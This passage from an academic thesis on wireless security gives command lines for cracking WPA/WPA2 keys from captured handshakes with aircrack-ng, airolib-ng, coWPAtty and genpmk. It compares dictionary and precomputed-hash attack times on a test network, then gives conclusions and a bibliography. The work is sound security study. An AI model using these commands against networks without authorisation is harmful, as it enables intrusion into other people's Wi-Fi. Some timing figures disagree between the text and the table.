[36]
 aircrack-ng [input] {capture file(s)}
 aircrack-ng Wind_Wi_Fi-01.cap –w dictionary.txt

Image 36 - Aircrack-ng in process

Image 37 - Aircrack-ng in process

[37]
 5.6. Airolib-ng & Aircrack-ng

The second attack is performed again with “Aircrack” but in combination with “Airolib-ng” and this time
through another attacking method, the precomputed hashes.
“Airolib-ng” is used to store and manage the ESSID lists, the password and to compute the Pairwise
Master Keys(PMKs). The program uses the SQLite3 database which is available for many platforms and
makes better memory and disk space management. Gives us the possibility to budget the PMK for use in
the future.

Image 38 - Attack using database

Image 39 - Attack using database

[38]
 5.7. coWPAtty
“Aircrack-ng” is a powerful tool, but it has some limitations. A more powerful attack tool is
“coWPAtty”. Created by Joshua Wright and as a good tool it can be combined with popular password
cracking tools such as «John the ripper».
It is a dictionary attack tool, which requires receiving at least 2 frames of a 4-way handshake.
“CoWPAtty” is the tool that we will use as second way of a dictionary attack. We have to specify the
dictionary attack, the SSID of the network and the log of IV's.
Usage
cowpatty –s Wind_Wi_Fi –rWind_Wi_Fi-01.cap –f dictionary.txt

Image 40 - CoWPAtty in process

Image 41 - CoWPAtty in process

[39]
 5.8.genpmk &coWPAtty
The “genpmk” command is a tool that used to create pre-computed hashes files. It’s a different tool for
attacking with pre-computed hashes. There is interdependence of the SSID of the Access Point. This
means that we need different hash sets for each unique SSID.
Usage
 genpmk -s Wind_Wi_Fi –d Wind_Wi_Fi.hash–f dictionary.txt
 cowpatty –s Wind_Wi_Fi –r Wind_Wi_Fi-01.cap –dWind_Wi_Fi.hash

Image 42 - Preparation with genpmk

[40]
 Image 43 - Preparation with genpmk

Image 44 - Attack using pre-computed hashes

[41]
 Image 45 - Attack using pre-computed hashes

5.9. Comparison of attacks

To attack the wireless network «Wind_Wi_Fi» used a dictionary with 2.804.985 words, size 26.9 MB.
The key phrase is located at 1.121.984 line, therefore the program for calculating the key worked 40% of
the lexicon. At the following table we observe the effects of the attacks. The application used for each
attack is in the column software, the column time shows in seconds the time duration of each attack, the
column keys/sec indicates the rate of access of the dictionary and the column Pre-calculated time (sec)
shows in seconds the amount of time it took tools “airolib-ng” and “genpmk” to create hash files.

Software Time (s) Keys/s Pre-calculated time (s)

aircrack-ng (dictionary) 715 1.181,71 -
airolib-ng &aircrack-ng
17 46.856,72 11.516
(pre-computed hashes)
coWPAtty (dictionary) 4.346,01 190,25 -
genpmk&coWPAtty
6,44 128.357,58 10.671,54
(pre-computed hashes)
Table3: A comparative table of the results of used in project attacks

Comparing each attack on the period of implementation , we observe that the most time was taken by
the command “coWPAtty” in dictionary attack with 2.764,63s , ie about 45 min, while the shortest
attack performed also with “CoWPAtty” in combination with “genpmk” (in attack with pre-computed
hashes) at only 6,44s.

[42]
 Time (sec)
Time (sec)

4346,01000

715
17 7
aircrack-ng (dictionary) airolib-ng & aircrack-ng coWPAtty (dictionary) genpmk & coWPAtty
(pre-computed hashes) (pre-computed hashes)

Graph 3: Time taken to crack WPA/WPA2

Especially, comparing dictionary attacks we observe that the command “Aircrack-ng” time completion of
the attack is 715s, about 12 min, in contrast to “coWPAtty”, which as mentioned above, took
approximately 45 min.

Time taken to crack WPA/WPA2 via dictionary attack (sec)

4346,01000

715

aircrack-ng (dictionary) coWPAtty (dictionary)

Graph 4: Time taken to crack WPA/WPA2 via dictionary attack

The precalculated hash attacks are faster in their execution, but they need more preparation time. The
“genpmk” command took 10.671,54s to create the hash file, about 3 hr, while the “airolib-ng”
command had 11.516s, about 3 hr and 20 min.

[43]
 11600,0 11516,0

11400,0

11200,0

11000,0

10800,0 10671,0
10600,0

10400,0

10200,0
airolib-ng & aircrack-ng (pre-computed hashes)
genpmk & coWPAtty (pre-computed hashes)

Graph 5: Time to pre-calculated hashes (seconds)

The commands that use hash files may take longer to prepare, but it is much faster to attack as “aircrack-
ng” associated with “airolib-ng” takes 17s, while “coWPAtty” associated with “genpmk” needed just
6,44s.

18 17
16
14
12
10
8 7
6
4
2
0

airolib-ng & aircrack-ng (pre-computed hashes)

genpmk & coWPAtty (pre-computed hashes)

Graph 6: Time taken to crack WPA/WPA2 via pre-calculated hashes

In conclusion, “Aircrack-ng” is better with dictionary attack, while “genpmk” & “coWPAtty” is better
to pre-computed hashes.

[44]
 CONCLUSIONS

This thesis introduced a general overview of some attacks which violate the security of wireless
networks.
Wireless LANs, because of the advantages they offer, have a great acceptance by consumers and are
spreading rapidly. However, the main issue that concerns all operators engaged in their development is
the issue of security.
To improve the security of wireless networks encryption algorithms were used, but there also have
weaknesses. The WEP encryption protocol appeared first and revealed many gaps in security. Despite all
the improvements, WEP failed to be characterized as a secure protocol. A new, more effective solution
was proposed to the standard 802.11i, the WPA encryption protocol and the final version of the WPA2,
to achieve even greater security. Developed to address and correct the deficiencies of WEP, it uses the
encryption algorithm CCMP, which provides confidentiality, authentication, integrity and protection
against replay packets. The attacks on networks with WEP and WPA / WPA2 encryption protocol were
automated using applications such as suite of tools AirCrack, so everyone who has a modern computer
and an understanding of computer technology may implement attacks. However, an integrated Security
system becomes weak if one does not know how to utilize it.

[45]
 BIBLIOGRAPHY
 Vijay K. Garg, 2007,Wireless Communications & Networking, University of Illinois, Chicago, USA.
 Stallings William, 2004, Wireless Communications & Networks, Second edition, Pearson Prentice Hall,
USA.
 B.P. Crow, I. Widjaja, J. G. Kim, and P. Sakai , 1997, Investigation of the IEEE 802.11 Medium Access
Control (MAC) Sublayer Functions, Dept. of Electr. &Comput. Eng., Arizona Univ., Tucson, AZ
 Johnny Cache, Joshua Wright, Vincent Liu, 2010, Hacking exposed wireless: Wireless security &
solutions, Second edition, Mc graw-Hill, USA
 A.K.M. Nazmus Sakib, FarihaTasmin Jaigirdar, Muntasim Munim,,Armin Akter, 2011,Security
Improvement of WPA 2, Global Journals Inc.USA
 A.Habibi Lashkari, Mir Mohammad Seyed Danesh, Behrang Samadi, 2009, A Survey on Wireless
Security protocols, IEEE, Beijing
 P. Arana, 2006, Benefits and Vulnerabilities of Wi-Fi Protected Access 2 (WPA2), INFS
 J. Korhonen,1999,HiperLan/2, Department of Computer Science and Engineering, Helsinki
 M. Papadopoulos, 2006, Wardriving, Warchalking & Wireless Hacking, 2nd National Conference, Athens
 T. Hassinen, 2006, Overview of WLAN security, Helsinki University of Technology, TKK T-110.5290
Seminar on Network Security

 Wigle Tools, Available from: https://wigle.net/tools [Accessed 10September 2015].

 Standards & Initiatives, Available from: http://www.intel.com [Accessed 13Jule 2015].
 IEEE Standards Association, Available from: http://standards.ieee.org [Accessed 13 Jule 2015].
 Wikipedia, the free encyclopedia, Available from: https://en.wikipedia.org/[Accessed 13 September
2015].
 Security & hacking tools, Available from: http://tools.securitytube.net [Accessed 4August 2015].
 Aircrack-ng, Available from: http://www.aircrack-ng.org [Accessed 19 September 2015].

[46]